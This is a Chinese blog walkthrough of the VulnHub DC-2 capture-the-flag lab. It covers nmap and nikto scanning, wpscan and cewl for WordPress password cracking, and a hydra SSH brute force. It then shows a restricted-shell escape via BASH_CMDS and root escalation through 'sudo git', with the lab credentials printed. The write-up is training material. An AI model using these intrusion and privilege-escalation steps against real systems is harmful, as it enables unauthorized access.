DC-2靶机

已于 2022-03-12 12:35:35 修改
阅读量254 收藏 1
点赞数 1
文章标签: linux 运维 服务器
于 2022-03-03 19:28:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52525624/article/details/123258903
版权
本文讲述了使用nmap工具进行网络扫描,解决域名解析问题,通过cewl和wpscan工具破解WordPress密码,最终通过SSH和git获取旗标的详细过程。涉及技术包括网络探测、密码破解和Web应用安全。
摘要由CSDN通过智能技术生成

nmap扫描

nmap -sP -v 192.168.1.0/24

nmap - T -sP 192.168.1.0/24 -oN nmap1.sP

我们发现浏览器访问http://192.168.220.132,发现无法正常访问页面,但在url地址栏会有http://dc-2域名提示,发现问题是本地无法解析域名dc-2

我们需要配置编辑/etc/hosts文件,添加靶机IP地址及对应域名:192.168.1.150  dc-2

vim /etc/hosts
192.168.1.150  dc-2

添加域名解析后,可以正常访问网页信息,并能在Flag页面找到flag1

提示使用cewl密码字典生成工具,并且在登录后可以找到下一个flag

flag1提示可以登录,但正常访问网页无法找到登录页面,所以使用nikto工具扫描网站结构,找到wp-login.php登录页面

nikto -h dc-2 -o nikto-dc2.txt
cat dc-2.nikto 

一般WordPress网站都会有admin用户,但需要爆破密码

使用wpscan工具扫描网站,获取可以登录网站的用户名,扫描后可以找到三个用户名:admin、tom、jerry

wpscan --url dc-2 -e u

 将扫描到的三个用户名添加到dc-2users.list

  1. vim dc-2users.list

  2. admin

  3. tom

  4. jerry

 

 使用flag1中提示的工具cewl生成密码字典dc-2pass.dic

  1. cewl dc-2 -w dc-2.dic

  2. cat  dc-2.dic

 wpscan --url dc-2 -U dc-2users.list -P dc-2.dic

  1. jerry / adipiscing

  2. tom / parturient

使用tom用户登录论坛,没找到有用信息

再使用jerry用户登录论坛,可以找到flag2,再无其他有用信息

Flag2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

如果你不能利用WordPress并抄近路,还有别的办法。

希望你能找到另一个切入点。

Flag2提示从另外一个方向切入,所以80端口切入失败,这时用到另外一个7744(ssh)端口

 使用hydra工具使用已生成的密码字典对已知的用户名进行ssh登录密码爆破

获得ssh登录用户:tom / parturient

  1. hydra -L dc-2users.list  -P dc-2pass.dic  192.168.220.132 ssh -s 7744

  2. login: tom   password: parturient

 使用tom用户ssh登录

ssh tom@192.168.220.132 -p 7744

 使用tom用户ssh登录后,使用 ls 命令在家目录中找到flag3.txt,有一个 su 提示应该切换用户

 但发现tom只能使用less、ls、scp、vi命令,无法直接使用su命令切换用户

Flag3:

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

可怜的老汤姆老是追杰瑞。也许他应该为他造成的所有压力负责。

BASH_CMDS[a]=/bin/sh ; a  #调用/bin/sh命令解释器
/bin/bash   #使用bash命令解释器
export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin  #设置环境变量

 切换到jerry用户,进入jerry家目录下

su jerry 

adipiscing #jerry用户登录密码

ls 找到flag4.txt,提示使用git 命令

Flag4:

Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!). 

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

  1. sudo -l  #查看可以使用root权限无密码的命令,有git命令

  2. sudo git -p –-help  #提权


 whoami   #查看当前用户

  1. passwd  root   #修改root密码

  2. 123456 #密码修改为:123456

 su root   #切换到root用户
cd /root  #进入到root家目录下
ls    #找到final-flag.txt

月隐柳梢幻玉笙
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机实战——DC-2
冠霖L的博客
09-27 4737
靶机DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip 描述:靶机DC-2与DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.132 Kali的IP地址:192.168.22...
DC-2 靶机
weixin_63492470的博客
03-11 5451
DC-2靶机下载地址: DC-2 | Five86 | DC Challenges 环境:DC-2靶机地址:192.168.1.139 nmap -sP 192.168.1.0/24 查看ip nmap -A 192.168.1.139 #这里我的靶机IP是132 dirb 192.168.1.139 爆破目录 这里查出了靶机IP为192.168.1.139 靶机开放了80端口和7744端口、 然后访问192.168.1.139发现是这个界面,什么也没有看到..
靶机 DC-2
m0_66299232的博客
09-13 1035
rbash是什么?rbash与一般shell的区别在于会限制一些行为,让一些命令无法执行。1>如何设置一个rbashcp /bin/bash /bin/rbash # 复制一个bash,重命名为rbashmkdir -p /home/test/.bin # 在test用户下新建一个.bin目录存放可以执行的命令2>rbash提权export -p //查看环境变量a //把/bin/sh给a/bin/bash。
DC-2靶机详解
最新发布
苏生要努力
03-03 1348
写写自己打DC-2的过程使用工具DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
DC2-靶机
Au
08-19 1739
下载地址 我配置的环境: kali:192.168.25.131 DC2 -靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机 192.168.25.128,判定为DC2-靶机,继续使用nmap获取详细信息 nmap -A -p 1-65535 192.1...
靶机DC-2
weixin_43940853的博客
11-18 216
目标靶机 : 192.168.230.228 kali : 192.168.230.226 发现是wordpress,考虑wpscan 点击flag,根据提示,需要用到cewl 简单的讲,这个工具是利用页面爬取深度生成字典的一个工具 wpscan -u http://dc-2 -eu -et -ep 利用wpscan扫一下用户名(一开始我以为用户名和密码都能扫出来,-ep还以为是passwo...
DC-2靶机(新手村)
热门推荐
weixin_42238862的博客
02-14 1万+
马上要开学了,又要去学习奇奇怪怪的古老的知识了!趁机在开学前争取能把靶机多打一点,充实一下自己的假期!那就开始我们的DC系列之DC-2 还是和第一篇一下,起手寻找目标,找到我们需要和谁一决胜负,这里我还是使用arp-scan进行目标机的确定 可以看到这几个IP,由经验可知,目标机是192.168.11.109这个IP。那我们就需要nmap去开路了呀,希望能找到一些可用的信息帮助我们拿到一个小小的shell。 这是我们使用nmap找到的信息,当然得去看看他的网站了呀 然后就看到了这个,这就需要懂得一点点
vulnhub-DC-2靶机实战
weixin_43781139的博客
03-11 261
下载地址 https://download.vulnhub.com/dc/DC-2.zip 实战步骤 首先我们打开靶机 用nmap探测存活主机 nmap -sS 192.168.207.* 151的80端口开着,我们访问看看 访问不进去,观察url栏,是域名解析问题,我们修改下文件 编辑/etc/hosts文件,添加靶机IP地址及对应域名:192.168.220.132 dc-2 vim /etc/hosts 192.168.207.151 dc-2 ...
vulnhub靶机DC-2
Keepb1ue的博客
09-29 2622
靶机配置说明 靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/ 靶机DC1 (VirtualBox) IP:192.168.56.111 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中也有详细的靶机说明,而FunBox需要寻找的flag总数为5个 靶机环境配置: 还是一样,将其桥接到同一张网卡即可。 靶机渗透开始: kali IP: 第一步还是需要确定目标IP 确定目标ip为192.168.56.111后nmap扫描下端
渗透DC-1靶机设计思路
05-24
2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值